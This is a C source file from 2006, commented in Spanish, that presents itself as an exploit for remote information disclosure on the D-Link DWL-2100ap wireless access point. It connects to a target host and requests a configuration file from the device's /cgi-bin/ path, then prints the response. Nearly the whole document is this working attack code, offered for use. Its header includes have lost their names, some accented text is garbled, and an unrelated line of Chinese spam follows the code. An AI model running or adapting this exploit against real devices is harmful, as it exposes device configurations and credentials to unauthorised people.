/* Nombre: Revelaci髇 remota de informaci髇 en D-Link DWL-2100ap Fichero: D-Link.Wireless.Access-Point.c Creado por: Lympex Contacto: Mail: lympex[at]gmail[dot]com Web: Http://L-Bytes.Tk Fecha: 08/06/2006 */ #include #include #include #pragma comment(lib,"ws2_32.lib") SOCKET sock; void Uso(char *exe) { printf("\n[+] Uso: %s server.com fichero.cfg",exe); printf("\n[+] Ejemplo: %s mi_server.com 80 Intruders.cfg\n",exe); return; } /*********************/ /* CONECTA A UN HOST */ /*********************/ BOOL Conecta(char *Host, short Puerto) { WSADATA wsaData; struct sockaddr_in Winsock_In; struct hostent *Ip; int err; /*iniciamos el socket*/ WSAStartup(MAKEWORD(2,2), &wsaData); /*asociamos*/ sock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); /*miramos si est?correcto, y as?no rellenamos la estructura Winsock_In para nada*/ if(sock==INVALID_SOCKET)return FALSE; /*rellenamos la estructura*/ Winsock_In.sin_port=htons(Puerto); Winsock_In.sin_family=AF_INET; /*pasamos el host -> ip*/ Ip=gethostbyname(Host); Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr))); /*conectamos*/ err=WSAConnect(sock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL); if(err==SOCKET_ERROR) return FALSE; else return TRUE; } int main(int argc, char *argv[]) { BOOL conectado; char Buff[1024]; int i; printf("\n*********************************************************"); printf("\n* Revelacion remota de informacion en D-Link DWL-2100ap *"); printf("\n*=======================================================*"); printf("\n* Exploit coded by Lympex - lympex[at]gmail[dot]com *"); printf("\n* Http://L-Bytes.Tk *"); printf("\n*********************************************************\n"); if(argc!=4) { Uso(argv[0]); return -1; } printf("\n[+] Conectando..."); conectado=Conecta(argv[1],(short)atoi(argv[2])); if(conectado==FALSE) { printf("ERROR\n"); return -1; } printf("OK"); memset(Buff,0,sizeof(char*)); sprintf(Buff,"GET /cgi-bin/%s HTTP/1.0 \n\n\0",argv[3]); i=0; while(Buff[i]!='\0')i++; send(sock,Buff,i,0); printf("\n\n------------------ [ DATOS ] ------------------\n\n"); i=recv(sock,Buff,1024,0); Buff[i]='\0'; printf("%s",Buff); printf("\n\n------------------ [ /DATOS ] -----------------\n"); WSACleanup(); return 0; }

亚洲欧美在线